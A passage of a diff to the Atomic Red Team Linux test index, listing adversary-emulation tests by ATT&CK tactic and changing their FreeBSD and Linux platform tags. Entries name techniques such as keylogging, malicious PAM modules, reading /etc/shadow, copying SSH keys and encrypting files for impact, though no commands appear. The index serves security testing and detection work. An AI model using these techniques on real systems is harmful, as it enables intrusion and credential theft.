[T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # command-and-control - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] + - Atomic Test #2: Base64 Encoded data (freebsd) [linux] - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -324,9 +378,10 @@ - T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux] + - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos] + - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] - T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -337,20 +392,20 @@ - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) - - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos] + - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - [T1105 Ingress Tool Transfer](../../T1105/T1105.md) - - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos] - - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #14: whois file download [freebsd, linux, macos] + - Atomic Test #1: rsync remote file copy (push) [linux, macos] + - Atomic Test #2: rsync remote file copy (pull) [linux, macos] + - Atomic Test #3: scp remote file copy (push) [linux, macos] + - Atomic Test #4: scp remote file copy (pull) [linux, macos] + - Atomic Test #5: sftp remote file copy (push) [linux, macos] + - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - Atomic Test #27: Linux Download File and Run [linux] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md) - - Atomic Test #1: Connection Proxy [freebsd, macos, linux] + - Atomic Test #1: Connection Proxy [linux, macos] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -359,18 +414,21 @@ # collection - [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #3: X Windows Capture [linux] + - Atomic Test #4: X Windows Capture (freebsd) [linux] - Atomic Test #5: Capture Linux Desktop using Import Tool [linux] + - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -379,16 +437,17 @@ - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #2: Stage data from Discovery.sh [linux, macos] + - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1115 Clipboard Data](../../T1115/T1115.md) - Atomic Test #5: Add or copy content to clipboard with xClip [linux] - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) - - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux] + - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux] + - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux] + - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux] - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -421,13 +480,17 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -435,7 +498,9 @@ - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] @@ -443,12 +508,15 @@ - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) @@ -464,8 +532,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -476,43 +545,56 @@ - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] + - Atomic Test #4: rc.local (FreeBSD) [linux] - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # credential-access - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] + - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - - Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux] + - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux] + - Atomic Test #3: Dump individual process memory with Python (Local) [linux] - Atomic Test #4: Capture Passwords with MimiPenguin [linux] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] @@ -528,19 +610,23 @@ - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux] - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) - - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux] + - Atomic Test #2: Discover Private SSH Keys [linux, macos] - Atomic Test #3: Copy Private SSH Keys with CP [linux] + - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux] - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux] + - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux] - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux] + - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux] - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] + - Atomic Test #2: Search Through sh History [linux] - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Find AWS credentials [freebsd, macos, linux] - - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux] - - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux] + - Atomic Test #1: Find AWS credentials [macos, linux] + - Atomic Test #3: Extract passwords with grep [linux, macos] + - Atomic Test #6: Find and Access Github Credentials [linux, macos] - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -549,95 +635,112 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] + - Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux] - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - - Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux] - - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux] - - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux] + - Atomic Test #2: Access /etc/master.passwd (Local) [linux] + - Atomic Test #3: Access /etc/passwd (Local) [linux] + - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux] + - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux] - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) # discovery - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos] + - Atomic Test #2: System Owner/User Discovery [linux, macos] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md) - Atomic Test #23: Active Directory Domain Search [linux] - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux] - - Atomic Test #2: View sudoers access [freebsd, linux, macos] - - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos] - - Atomic Test #4: List opened files by user [freebsd, linux, macos] + - Atomic Test #1: Enumerate all accounts (Local) [linux] + - Atomic Test #2: View sudoers access [linux, macos] + - Atomic Test #3: View accounts with UID 0 [linux, macos] + - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos] + - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] + - Atomic Test #7: Enumerate users and groups [linux, macos] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux] - [T1007 System Service Discovery](../../T1007/T1007.md) - Atomic Test #3: System Service Discovery - systemctl [linux] + - Atomic Test #4: System Service Discovery - service [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] - Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux] - [T1135 Network Share Discovery](../../T1135/T1135.md) - Atomic Test #2: Network Share Discovery - linux [linux] + - Atomic Test #3: Network Share Discovery - FreeBSD [linux] - T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #3: List OS Information [freebsd, linux, macos] + - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #8: Hostname Discovery [freebsd, linux, macos] - - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux] + - Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux] + - Atomic Test #8: Hostname Discovery [linux, macos] + - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos] - Atomic Test #25: Linux List Kernel Modules [linux] + - Atomic Test #26: FreeBSD List Kernel Modules [linux] - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md) - - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux] + - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux] + - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] + - Atomic Test #4: System Network Configuration Discovery (freebsd) [linux] - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1083 File and Directory Discovery](../../T1083/T1083.md) - - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux] - - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux] + - Atomic Test #3: Nix File and Directory Discovery [linux, macos] + - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos] + - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos] - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos] + - Atomic Test #1: Process Discovery - ps [linux, macos] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) - - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux] + - Atomic Test #1: Permission Groups Discovery (Local) [linux, macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #1: Examine password complexity policy - Ubuntu [linux] + - Atomic Test #2: Examine password complexity policy - FreeBSD [linux] - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux] - Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux] - Atomic Test #5: Examine password expiration policy - All Linux [linux] - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) - - Atomic Test #3: Discover System Language with locale [freebsd, linux] + - Atomic Test #3: Discover System Language with locale [linux] - Atomic Test #4: Discover System Language with localectl [linux] - Atomic Test #5: Discover System Language by locale file [linux] - - Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux] + - Atomic Test #6: Discover System Language by Environment Variable Query [linux] - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] + - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux] - [T1018 Remote System Discovery](../../T1018/T1018.md) - - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos] - - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos] + - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] + - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - Atomic Test #12: Remote System Discovery - ip neighbour [linux] - Atomic Test #13: Remote System Discovery - ip route [linux] + - Atomic Test #14: Remote System Discovery - netstat [linux] - Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux] - [T1046 Network Service Discovery](../../T1046/T1046.md) - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] + - Atomic Test #3: Port Scan Nmap for FreeBSD [linux] - T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -662,38 +765,41 @@ - [T1531 Account Access Removal](../../T1531/T1531.md) - Atomic Test #4: Change User Password via passwd [macos, linux] - [T1486 Data Encrypted for Impact](../../T1486/T1486.md) - - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux] + - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux] + - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux] + - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux] - T1488 Disk Content Wipe [CONTRIBUTE A 